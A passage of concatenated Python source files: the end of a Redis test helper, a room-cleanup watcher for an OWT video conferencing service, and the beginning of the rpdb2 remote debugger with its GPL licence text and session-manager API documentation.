self._client = redis.Redis('localhost', REDIS_TEST_PORT)
except ConnectionFailure:
continue
else:
break
else:
self.shutdown()
assert False, 'Cannot connect to the redis test instance'
@property
def client(self):
return self._client
def shutdown(self):
if self._process:
self._process.terminate()
self._process.wait()
self._process = None
|
watcher.py | #!/usr/bin/python3
from threading import Thread, Event
from owtapi import OWTAPI
from configuration import env
import time
inactive_time=float(env["INACTIVE_TIME"])
class RoomWatcher(object):
def __init__(self, inactive=inactive_time, stop=Event()):
super(RoomWatcher, self).__init__()
self._stop=stop
self._inactive=inactive
self._rooms={}
Thread(target=self._cleanup_thread).start()
def get(self, name):
if name not in self._rooms: return (None,None)
return (self._rooms[name]["room"], self._rooms[name]["stream"])
def set(self, name, room, stream=None):
if name in self._rooms: return
self._rooms[name]={
"room": room,
"stream": stream,
"time": int(time.time()),
}
def _cleanup_thread(self):
owt=OWTAPI()
while not self._stop.is_set():
todelete=[]
for name in self._rooms:
try:
participants=owt.list_participants(self._rooms[name]["room"])
except:
participants=0
now=int(time.time())
print("Watcher: room {} participant {} inactive {}".format(name,participants,now-self._rooms[name]["time"]), flush=True)
if participants>0:
self._rooms[name]["time"]=now
elif now-self._rooms[name]["time"]>self._inactive:
todelete.append(name)
for name in todelete:
stream1=self._rooms[name]["stream"]
room1=self._rooms[name]["room"]
try:
streams=[stream1] if stream1 else owt.list_streams(name)
except:
streams=[]
# for stream1 in streams:
# print("Remove stream {}".format(stream1), flush=True)
# try:
# owt.delete_stream(room1,stream1)
# except:
# pass
print("Remove room {}:{}".format(name,room1), flush=True)
try:
owt.delete_room(room1)
except:
pass
self._rooms.pop(name,None)
self._stop.wait(self._inactive/3.0)
|
rpdb2.py | #! /usr/bin/env python
"""
rpdb2.py - version 2.4.8
A remote Python debugger for CPython
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02111-1307 USA
"""
COPYRIGHT_NOTICE = """Copyright (C) 2005-2009 Nir Aides"""
CREDITS_NOTICE = """Work on version 2.4.8 was sponsored by Investortools, Inc."""
LICENSE_NOTICE = """
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
A copy of the GPL with the precise terms and conditions for
copying, distribution and modification follow:
"""
COPY_OF_THE_GPL_LICENSE = """
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0.
This License applies to any program or other work which contains a notice
placed by the copyright holder saying it may be distributed under the terms
of this General Public License. The "Program", below, refers to any such
program or work, and a "work based on the Program" means either the Program
or any derivative work under copyright law: that is to say, a work containing
the Program or a portion of it, either verbatim or with modifications and/or
translated into another language. (Hereinafter, translation is included
without limitation in the term "modification".) Each licensee is addressed
as "you".
Activities other than copying, distribution and modification are not covered
by this License; they are outside its scope. The act of running the Program
is not restricted, and the output from the Program is covered only if its
contents constitute a work based on the Program (independent of having been
made by running the Program). Whether that is true depends on what the
Program does.
1.
You may copy and distribute verbatim copies of the Program's source code as
you receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice and
disclaimer of warranty; keep intact all the notices that refer to this
License and to the absence of any warranty; and give any other recipients of
the Program a copy of this License along with the Program.
You may charge a fee for the physical act of transferring a copy, and you
may at your option offer warranty protection in exchange for a fee.
2.
You may modify your copy or copies of the Program or any portion of it, thus
forming a work based on the Program, and copy and distribute such modifications
or work under the terms of Section 1 above, provided that you also meet all
of these conditions:
a) You must cause the modified files to carry prominent notices stating
that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in whole
or in part contains or is derived from the Program or any part thereof,
to be licensed as a whole at no charge to all third parties under the
terms of this License.
c) If the modified program normally reads commands interactively when
run, you must cause it, when started running for such interactive use in
the most ordinary way, to print or display an announcement including an
appropriate copyright notice and a notice that there is no warranty (or
else, saying that you provide a warranty) and that users may redistribute
the program under these conditions, and telling the user how to view a
copy of this License. (Exception: if the Program itself is interactive
but does not normally print such an announcement, your work based on the
Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If identifiable
sections of that work are not derived from the Program, and can be reasonably
considered independent and separate works in themselves, then this License,
and its terms, do not apply to those sections when you distribute them as
separate works. But when you distribute the same sections as part of a whole
which is a work based on the Program, the distribution of the whole must be
on the terms of this License, whose permissions for other licensees extend to
the entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest your
rights to work written entirely by you; rather, the intent is to exercise the
right to control the distribution of derivative or collective works based on
the Program.
In addition, mere aggregation of another work not based on the Program with
the Program (or with a work based on the Program) on a volume of a storage or
distribution medium does not bring the other work under the scope of this
License.
3. You may copy and distribute the Program (or a work based on it, under
Section 2) in object code or executable form under the terms of Sections 1
and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable source
code, which must be distributed under the terms of Sections 1 and 2 above
on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three years, to
give any third party, for a charge no more than your cost of physically
performing source distribution, a complete machine-readable copy of the
corresponding source code, to be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer to
distribute corresponding source code. (This alternative is allowed only
for noncommercial distribution and only if you received the program in
object code or executable form with such an offer, in accord with
Subsection b above.)
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all
the source code for all modules it contains, plus any associated interface
definition files, plus the scripts used to control compilation and
installation of the executable. However, as a special exception, the source
code distributed need not include anything that is normally distributed (in
either source or binary form) with the major components (compiler, kernel,
and so on) of the operating system on which the executable runs, unless that
component itself accompanies the executable.
If distribution of executable or object code is made by offering access to
copy from a designated place, then offering equivalent access to copy the
source code from the same place counts as distribution of the source code,
even though third parties are not compelled to copy the source along with
the object code.
4. You may not copy, modify, sublicense, or distribute the Program except as
expressly provided under this License. Any attempt otherwise to copy, modify,
sublicense or distribute the Program is void, and will automatically
terminate your rights under this License. However, parties who have received
copies, or rights, from you under this License will not have their licenses
terminated so long as such parties remain in full compliance.
5. You are not required to accept this License, since you have not signed it.
However, nothing else grants you permission to modify or distribute the
Program or its derivative works. These actions are prohibited by law if you
do not accept this License. Therefore, by modifying or distributing the
Program (or any work based on the Program), you indicate your acceptance of
this License to do so, and all its terms and conditions for copying,
distributing or modifying the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the Program),
the recipient automatically receives a license from the original licensor to
copy, distribute or modify the Program subject to these terms and conditions.
You may not impose any further restrictions on the recipients' exercise of
the rights granted herein. You are not responsible for enforcing compliance
by third parties to this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot distribute so as to satisfy
simultaneously your obligations under this License and any other pertinent
obligations, then as a consequence you may not distribute the Program at all.
For example, if a patent license would not permit royalty-free redistribution
of the Program by all those who receive copies directly or indirectly through
you, then the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under any
particular circumstance, the balance of the section is intended to apply and
the section as a whole is intended to apply in other circumstances.
It is not the purpose of this section to induce you to infringe any patents
or other property right claims or to contest validity of any such claims;
this section has the sole purpose of protecting the integrity of the free
software distribution system, which is implemented by public license
practices. Many people have made generous contributions to the wide range of
software distributed through that system in reliance on consistent
application of that system; it is up to the author/donor to decide if he or
she is willing to distribute software through any other system and a licensee
cannot impose that choice.
This section is intended to make thoroughly clear what is believed to be a
consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in certain
countries either by patents or by copyrighted interfaces, the original
copyright holder who places the Program under this License may add an
explicit geographical distribution limitation excluding those countries,
so that distribution is permitted only in or among countries not thus
excluded. In such case, this License incorporates the limitation as if
written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions of
the General Public License from time to time. Such new versions will be
similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and
"any later version", you have the option of following the terms and
conditions either of that version or of any later version published by the
Free Software Foundation. If the Program does not specify a version number
of this License, you may choose any version ever published by the
Free Software Foundation.
10. If you wish to incorporate parts of the Program into other free programs
whose distribution conditions are different, write to the author to ask for
permission. For software which is copyrighted by the Free Software
Foundation, write to the Free Software Foundation; we sometimes make
exceptions for this. Our decision will be guided by the two goals of
preserving the free status of all derivatives of our free software and of
promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR
THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE
STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE
PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND
PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE,
YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO
LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR
THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
"""
if '.' in __name__:
raise ImportError('rpdb2 must not be imported as part of a package!')
import subprocess
import threading
import traceback
import zipimport
import tempfile
import __main__
import platform
import operator
import weakref
import os.path
import zipfile
import pickle
import socket
import getopt
import string
import random
import base64
import atexit
import locale
import codecs
import signal
import errno
import time
import copy
import hmac
import stat
import zlib
import sys
import cmd
import imp
import os
import re
try:
import hashlib
_md5 = hashlib.md5
except:
import md5
_md5 = md5
try:
import compiler
import sets
except:
pass
try:
import popen2
except:
pass
try:
from Crypto.Cipher import DES
except ImportError:
pass
#
# Pre-Import needed by my_abspath1
#
try:
from nt import _getfullpathname
except ImportError:
pass
try:
import SimpleXMLRPCServer
import xmlrpclib
import SocketServer
import commands
import copy_reg
import httplib
import thread
except:
#
# The above modules were renamed in Python 3 so try to import them 'as'
#
import xmlrpc.server as SimpleXMLRPCServer
import xmlrpc.client as xmlrpclib
import socketserver as SocketServer
import subprocess as commands
import copyreg as copy_reg
import http.client as httplib
import _thread as thread
#
# Needed in py3k path.
#
import numbers
#
#-------------------------------- Design Notes -------------------------------
#
"""
Design:
RPDB2 divides the world into two main parts: debugger and debuggee.
The debuggee is the script that needs to be debugged.
The debugger is another script that attaches to the debuggee for the
purpose of debugging.
Thus RPDB2 includes two main components: The debuggee-server that runs
in the debuggee and the session-manager that runs in the debugger.
The session manager and the debuggee-server communicate via XML-RPC.
The main classes are: CSessionManager and CDebuggeeServer
"""
#
#--------------------------------- Export functions ------------------------
#
TIMEOUT_FIVE_MINUTES = 5 * 60.0
def start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted = True,
fAllowRemote = False,
timeout = TIMEOUT_FIVE_MINUTES,
source_provider = None,
fDebug = False,
depth = 0
):
"""
Use 'start_embedded_debugger' to invoke the debugger engine in embedded
scripts. put the following line as the first line in your script:
import rpdb2; rpdb2.start_embedded_debugger(<some-password-string>)
This will cause the script to freeze until a debugger console attaches.
_rpdb2_pwd - The password that governs security of client/server communication.
fAllowUnencrypted - Allow unencrypted communications. Communication will
be authenticated but encrypted only if possible.
fAllowRemote - Allow debugger consoles from remote machines to connect.
timeout - Seconds to wait for attachment before giving up. Once the
timeout period expires, the debuggee will resume execution.
If None, never give up. If 0, do not wait at all.
source_provider - When script source is not available on file system it is
possible to specify a function that receives a "filename" and returns
its source. If filename specifies a file that does not fall under
the jurisdiction of this function it should raise IOError. If this
function is responsible for the specified file but the source is
not available it should raise IOError(SOURCE_NOT_AVAILABLE). You can
study the way source_provider_blender() works. Note that a misbehaving
function can break the debugger.
fDebug - debug output.
depth - Depth of the frame in which the debugger should be started. This
defaults to '0' so the top of stack will be in the code where
start_embedded_debugger is called.
IMPORTNAT SECURITY NOTE:
USING A HARDCODED PASSWORD MAY BE UNSECURE SINCE ANYONE WITH READ
PERMISSION TO THE SCRIPT WILL BE ABLE TO READ THE PASSWORD AND CONNECT TO
THE DEBUGGER AND DO WHATEVER THEY WISH VIA THE 'EXEC' DEBUGGER COMMAND.
It is safer to use: start_embedded_debugger_interactive_password()
"""
return __start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
timeout,
source_provider,
fDebug,
depth + 2
)
def start_embedded_debugger_interactive_password(
fAllowUnencrypted = True,
fAllowRemote = False,
timeout = TIMEOUT_FIVE_MINUTES,
source_provider = None,
fDebug = False,
stdin = sys.stdin,
stdout = sys.stdout,
depth = 0
):
if g_server is not None:
return
while True:
if stdout is not None:
stdout.write('Please type password:')
_rpdb2_pwd = stdin.readline().rstrip('\n')
_rpdb2_pwd = as_unicode(_rpdb2_pwd, detect_encoding(stdin), fstrict = True)
try:
return __start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
timeout,
source_provider,
fDebug,
depth + 2
)
except BadArgument:
stdout.write(STR_PASSWORD_BAD)
def settrace():
"""
Trace threads that were created with thread.start_new_thread()
To trace, call this function from the thread target function.
NOTE: The main thread and any threads created with the threading module
are automatically traced, and there is no need to invoke this function
for them.
Note: This call does not pause the script.
"""
return __settrace()
def setbreak(depth = 0):
"""
Pause the script for inspection at next script statement.
"""
return __setbreak(depth + 2)
def set_temp_breakpoint(path, scopename = '', lineno = 1):
"""
Set a temporary breakpoint in a file. path must be an absolute path.
scopename can either be an empty string or a fully qualified scope name
(For example u'g_debugger.m_bp_manager.set_temp_breakpoint'). lineno is
either relative to file start or to scope start.
To set a temporary breakpoint to hit when a file is first
imported or exec-uted call set_temp_breakpoint(path)
This function may throw a varaiety of exceptions.
"""
path = as_unicode(path, fstrict = True)
scopename = as_unicode(scopename, fstrict = True)
return __set_temp_breakpoint(path, scopename, lineno)
#
#----------------------------------- Interfaces ------------------------------
#
VERSION = (2, 4, 8, 0, 'Tychod')
RPDB_TITLE = "RPDB 2.4.8 - Tychod"
RPDB_VERSION = "RPDB_2_4_8"
RPDB_COMPATIBILITY_VERSION = "RPDB_2_4_0"
def get_version():
return RPDB_VERSION
def get_interface_compatibility_version():
return RPDB_COMPATIBILITY_VERSION
class CSimpleSessionManager:
"""
This is a wrapper class that simplifies launching and controlling of a
debuggee from within another program. For example, an IDE that launches
a script for debugging puposes can use this class to launch, debug and
stop a script.
"""
def __init__(self, fAllowUnencrypted = True):
self.__sm = CSessionManagerInternal(
_rpdb2_pwd = None,
fAllowUnencrypted = fAllowUnencrypted,
fAllowRemote = False,
host = LOCALHOST
)
self.m_fRunning = False
event_type_dict = {CEventUnhandledException: {}}
self.__sm.register_callback(self.__unhandled_exception, event_type_dict, fSingleUse = False)
event_type_dict = {CEventState: {}}
self.__sm.register_callback(self.__state_calback, event_type_dict, fSingleUse = False)
event_type_dict = {CEventExit: {}}
self.__sm.register_callback(self.__termination_callback, event_type_dict, fSingleUse = False)
def shutdown(self):
self.__sm.shutdown()
def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = False):
command_line = as_unicode(command_line, encoding, fstrict = True)
self.m_fRunning = False
self.__sm.launch(fchdir, command_line, fload_breakpoints)
def request_go(self):
self.__sm.request_go()
def detach(self):
self.__sm.detach()
def stop_debuggee(self):
self.__sm.stop_debuggee()
def get_session_manager(self):
return self.__sm
def prepare_attach(self):
"""
Use this method to attach a debugger to the debuggee after an
exception is caught.
"""
_rpdb2_pwd = self.__sm.get_password()
si = self.__sm.get_server_info()
rid = si.m_rid
if os.name == 'posix':
#
# On posix systems the password is set at the debuggee via
# a special temporary file.
#
create_pwd_file(rid, _rpdb2_pwd)
_rpdb2_pwd = None
return (rid, _rpdb2_pwd)
#
# Override these callbacks to react to the related events.
#
def unhandled_exception_callback(self):
_print('unhandled_exception_callback')
self.request_go()
def script_paused(self):
_print('script_paused')
self.request_go()
def script_terminated_callback(self):
_print('script_terminated_callback')
#
# Private Methods
#
def __unhandled_exception(self, event):
self.unhandled_exception_callback()
def __termination_callback(self, event):
self.script_terminated_callback()
def __state_calback(self, event):
"""
Handle state change notifications from the debugge.
"""
if event.m_state != STATE_BROKEN:
return
if not self.m_fRunning:
#
# First break comes immediately after launch.
#
print_debug('Simple session manager continues on first break.')
self.m_fRunning = True
self.request_go()
return
if self.__sm.is_unhandled_exception():
return
sl = self.__sm.get_stack(tid_list = [], fAll = False)
if len(sl) == 0:
self.request_go()
return
st = sl[0]
s = st.get(DICT_KEY_STACK, [])
if len(s) == 0:
self.request_go()
return
e = s[-1]
function_name = e[2]
filename = os.path.basename(e[0])
if filename != DEBUGGER_FILENAME:
#
# This is a user breakpoint (e.g. rpdb2.setbreak())
#
self.script_paused()
return
#
# This is the setbreak() before a fork, exec or program
# termination.
#
self.request_go()
return
class CSessionManager:
"""
Interface to the session manager.
This is the interface through which the debugger controls and
communicates with the debuggee.
Accepted strings are either utf-8 or Unicode unless specified otherwise.
Returned strings are Unicode (also when embedded in data structures).
You can study the way it is used in StartClient()
"""
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
if _rpdb2_pwd != None:
assert(is_valid_pwd(_rpdb2_pwd))
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
self.__smi = CSessionManagerInternal(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
host
)
def shutdown(self):
return self.__smi.shutdown()
def set_printer(self, printer):
"""
'printer' is a function that takes one argument and prints it.
You can study CConsoleInternal.printer() as example for use
and rational.
"""
return self.__smi.set_printer(printer)
def report_exception(self, type, value, tb):
"""
Sends exception information to the printer.
"""
return self.__smi.report_exception(type, value, tb)
def register_callback(self, callback, event_type_dict, fSingleUse):
"""
Receive events from the session manager.
The session manager communicates it state mainly by firing events.
You can study CConsoleInternal.__init__() as example for use.
For details see CEventDispatcher.register_callback()
"""
return self.__smi.register_callback(
callback,
event_type_dict,
fSingleUse
)
def remove_callback(self, callback):
return self.__smi.remove_callback(callback)
def refresh(self):
"""
Fire again all relevant events needed to establish the current state.
"""
return self.__smi.refresh()
def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = True):
"""
Launch debuggee in a new process and attach.
fchdir - Change current directory to that of the debuggee.
command_line - command line arguments pass to the script as a string.
fload_breakpoints - Load breakpoints of last session.
if command line is not a unicode string it will be decoded into unicode
with the given encoding
"""
command_line = as_unicode(command_line, encoding, fstrict = True)
return self.__smi.launch(fchdir, command_line, fload_breakpoints)
def restart(self):
"""
Restart debug session with same command_line and fchdir arguments
which were used in last launch.
"""
return self.__smi.restart()
def get_launch_args(self):
"""
Return command_line and fchdir arguments which were used in last
launch as (last_fchdir, last_command_line).
Returns (None, None) if there is no info.
"""
return self.__smi.get_launch_args()
def attach(self, key, name = None, encoding = 'utf-8'):
"""
Attach to a debuggee (establish communication with the debuggee-server)
key - a string specifying part of the filename or PID of the debuggee.
if key is not a unicode string it will be decoded into unicode
with the given encoding
"""
key = as_unicode(key, encoding, fstrict = True)
return self.__smi.attach(key, name)
def detach(self):
"""
Let the debuggee go...
"""
return self.__smi.detach()
def request_break(self):
return self.__smi.request_break()
def request_go(self):
return self.__smi.request_go()
def request_go_breakpoint(self, filename, scope, lineno):
"""
Go (run) until the specified location is reached.
"""
filename = as_unicode(filename, fstrict = True)
scope = as_unicode(scope, fstrict = True)
return self.__smi.request_go_breakpoint(filename, scope, lineno)
def request_step(self):
"""
Go until the next line of code is reached.
"""
return self.__smi.request_step()
def request_next(self):
"""
Go until the next line of code in the same scope is reached.
"""
return self.__smi.request_next()
def request_return(self):
"""
Go until end of scope is reached.
"""
return self.__smi.request_return()
def request_jump(self, lineno):
"""
Jump to the specified line number in the same scope.
"""
return self.__smi.request_jump(lineno)
#
# REVIEW: should return breakpoint ID
#
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr):
"""
Set a breakpoint.
filename - (Optional) can be either a file name or a module name,
full path, relative path or no path at all.
If filname is None or '', then the current module is
used.
scope - (Optional) Specifies a dot delimited scope for the
breakpoint, such as: foo or myClass.foo
lineno - (Optional) Specify a line within the selected file or
if a scope is specified, an zero-based offset from the
start of the scope.
expr - (Optional) A Python expression that will be evaluated
locally when the breakpoint is hit. The break will
occur only if the expression evaluates to true.
"""
filename = as_unicode(filename, fstrict = True)
scope = as_unicode(scope, fstrict = True)
expr = as_unicode(expr, fstrict = True)
return self.__smi.set_breakpoint(
filename,
scope,
lineno,
fEnabled,
expr
)
def disable_breakpoint(self, id_list, fAll):
"""
Disable breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - disable all breakpoints regardless of id_list.
"""
return self.__smi.disable_breakpoint(id_list, fAll)
def enable_breakpoint(self, id_list, fAll):
"""
Enable breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - disable all breakpoints regardless of id_list.
"""
return self.__smi.enable_breakpoint(id_list, fAll)
def delete_breakpoint(self, id_list, fAll):
"""
Delete breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - disable all breakpoints regardless of id_list.
"""
return self.__smi.delete_breakpoint(id_list, fAll)
def get_breakpoints(self):
"""
Return breakpoints in a dictionary of id keys to CBreakPoint values
"""
return self.__smi.get_breakpoints()
def save_breakpoints(self, _filename = ''):
"""
Save breakpoints to file, locally (on the client side)
"""
return self.__smi.save_breakpoints(_filename)
def load_breakpoints(self, _filename = ''):
"""
Load breakpoints from file, locally (on the client side)
"""
return self.__smi.load_breakpoints(_filename)
def set_trap_unhandled_exceptions(self, ftrap):
"""
Set trap-unhandled-exceptions mode.
ftrap with a value of False means unhandled exceptions will be ignored.
The session manager default is True.
"""
return self.__smi.set_trap_unhandled_exceptions(ftrap)
def get_trap_unhandled_exceptions(self):
"""
Get trap-unhandled-exceptions mode.
"""
return self.__smi.get_trap_unhandled_exceptions()
def set_fork_mode(self, ffork_into_child, ffork_auto):
"""
Determine how to handle os.fork().
ffork_into_child - True|False - If True, the debugger will debug the
child process after a fork, otherwise the debugger will continue
to debug the parent process.
ffork_auto - True|False - If True, the debugger will not pause before
a fork and will automatically make a decision based on the
value of the ffork_into_child flag.
"""
return self.__smi.set_fork_mode(ffork_into_child, ffork_auto)
def get_fork_mode(self):
"""
Return the fork mode in the form of a (ffork_into_child, ffork_auto)
flags tuple.
"""
return self.__smi.get_fork_mode()
def get_stack(self, tid_list, fAll):
return self.__smi.get_stack(tid_list, fAll)
def get_source_file(self, filename, lineno, nlines):
filename = as_unicode(filename, fstrict = True)
return self.__smi.get_source_file(filename, lineno, nlines)
def get_source_lines(self, nlines, fAll):
return self.__smi.get_source_lines(nlines, fAll)
def set_frame_index(self, frame_index):
"""
Set frame index. 0 is the current executing frame, and 1, 2, 3,
are deeper into the stack.
"""
return self.__smi.set_frame_index(frame_index)
def get_frame_index(self):
"""
Get frame index. 0 is the current executing frame, and 1, 2, 3,
are deeper into the stack.
"""
return self.__smi.get_frame_index()
def set_analyze(self, fAnalyze):
"""
Toggle analyze mode. In analyze mode the stack switches to the
exception stack for examination.
"""
return self.__smi.set_analyze(fAnalyze)
def set_host(self, host):
"""
Set host to specified host (string) for attaching to debuggies on
specified host. host can be a host name or ip address in string form.
"""
return self.__smi.set_host(host)
def get_host(self):
return self.__smi.get_host()
def calc_server_list(self):
"""
Calc servers (debuggable scripts) list on specified host.
Returns a tuple of a list and a dictionary.
The list is a list of CServerInfo objects sorted by their age
ordered oldest last.
The dictionary is a dictionary of errors that were encountered
during the building of the list. The dictionary has error (exception)
type as keys and number of occurances as values.
"""
return self.__smi.calc_server_list()
def get_server_info(self):
"""
Return CServerInfo server info object that corresponds to the
server (debugged script) to which the session manager is
attached.
"""
return self.__smi.get_server_info()
def get_namespace(self, nl, filter_level, repr_limit = 128, fFilter = "DEPRECATED"):
"""
get_namespace is designed for locals/globals panes that let
the user inspect a namespace tree in GUI debuggers such as Winpdb.
You can study the way it is used in Winpdb.
nl - List of tuples, where each tuple is made of a python expression
as string and a flag that controls whether to "expand" the
value, that is, to return its children as well in case it has
children e.g. lists, dictionaries, etc...
filter_level - 0, 1, or 2. Filter out methods and functions from
classes and objects. (0 - None, 1 - Medium, 2 - Maximum).
repr_limit - Length limit (approximated) to be imposed on repr() of
returned items.
examples of expression lists:
[('x', false), ('y', false)]
[('locals()', true)]
[('a.b.c', false), ('my_object.foo', false), ('another_object', true)]
Return value is a list of dictionaries, where every element
in the list corresponds to an element in the input list 'nl'.
Each dictionary has the following keys and values:
DICT_KEY_EXPR - the original expression string.
DICT_KEY_REPR - A repr of the evaluated value of the expression.
DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
valid for the purpose of re-evaluation.
DICT_KEY_TYPE - A string representing the type of the experession's
evaluated value.
DICT_KEY_N_SUBNODES - If the evaluated value has children like items
in a list or in a dictionary or members of a class,
etc, this key will have their number as value.
DICT_KEY_SUBNODES - If the evaluated value has children and the
"expand" flag was set for this expression, then the
value of this key will be a list of dictionaries as
described below.
DICT_KEY_ERROR - If an error prevented evaluation of this expression
the value of this key will be a repr of the
exception info: repr(sys.exc_info())
Each dictionary for child items has the following keys and values:
DICT_KEY_EXPR - The Python expression that designates this child.
e.g. 'my_list[0]' designates the first child of the
list 'my_list'
DICT_KEY_NAME - a repr of the child name, e.g '0' for the first item
in a list.
DICT_KEY_REPR - A repr of the evaluated value of the expression.
DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
valid for the purpose of re-evaluation.
DICT_KEY_TYPE - A string representing the type of the experession's
evaluated value.
DICT_KEY_N_SUBNODES - If the evaluated value has children like items
in a list or in a dictionary or members of a class,
etc, this key will have their number as value.
"""
if fFilter != "DEPRECATED":
filter_level = fFilter
filter_level = int(filter_level)
return self.__smi.get_namespace(nl, filter_level, repr_limit)
#
# REVIEW: remove warning item.
#
def evaluate(self, expr):
"""
Evaluate a python expression in the context of the current thread
and frame.
Return value is a tuple (v, w, e) where v is a repr of the evaluated
expression value, w is always '', and e is an error string if an error
occurred.
NOTE: This call might not return since debugged script logic can lead
to tmporary locking or even deadlocking.
"""
expr = as_unicode(expr, fstrict = True)
return self.__smi.evaluate(expr)
def execute(self, suite):
"""
Execute a python statement in the context of the current thread
and frame.
Return value is a tuple (w, e) where w and e are warning and
error strings (respectively) if an error occurred.
NOTE: This call might not return since debugged script logic can lead
to tmporary locking or even deadlocking.
"""
suite = as_unicode(suite, fstrict = True)
return self.__smi.execute(suite)
def complete_expression(self, expr):
"""
Return matching completions for expression.
Accepted expressions are of the form a.b.c
Dictionary lookups or functions call are not evaluated. For
example: 'getobject().complete' or 'dict[item].complete' are
not processed.
On the other hand partial expressions and statements are
accepted. For example: 'foo(arg1, arg2.member.complete' will
be accepted and the completion for 'arg2.member.complete' will
be calculated.
Completions are returned as a tuple of two items. The first item
is a prefix to expr and the second item is a list of completions.
For example if expr is 'foo(self.comp' the returned tuple can
be ('foo(self.', ['complete', 'completion', etc...])
"""
expr = as_unicode(expr, fstrict = True)
return self.__smi.complete_expression(expr)
def set_encoding(self, encoding, fraw = False):
"""
Set the encoding that will be used as source encoding for execute()
evaluate() commands and in strings returned by get_namespace().
The encoding value can be either 'auto' or any encoding accepted by
the codecs module. If 'auto' is specified, the encoding used will be
the source encoding of the active scope, which is utf-8 by default.
The default encoding value is 'auto'.
If fraw is True, strings returned by evaluate() and get_namespace()
will represent non ASCII characters as an escape sequence.
"""
return self.__smi.set_encoding(encoding, fraw)
def get_encoding(self):
"""
return the (encoding, fraw) tuple.
"""
return self.__smi.get_encoding()
def set_synchronicity(self, fsynchronicity):
"""
Set the synchronicity mode.
Traditional Python debuggers that use the inspected thread (usually
the main thread) to query or modify the script name-space have to
wait until the script hits a break-point. Synchronicity allows the
debugger to query and modify the script name-space even if its
threads are still running or blocked in C library code by using
special worker threads. In some rare cases querying or modifying data
in synchronicity can crash the script. For example in some Linux
builds of wxPython querying the state of wx objects from a thread
other than the GUI thread can crash the script. If this happens or
if you want to restrict these operations to the inspected thread,
turn synchronicity off.
On the other hand when synchronicity is off it is possible to
accidentally deadlock or block indefinitely the script threads by
querying or modifying particular data structures.
The default is on (True).
"""
return self.__smi.set_synchronicity(fsynchronicity)
def get_synchronicity(self):
return self.__smi.get_synchronicity()
def get_state(self):
"""
Get the session manager state. Return one of the STATE_* constants
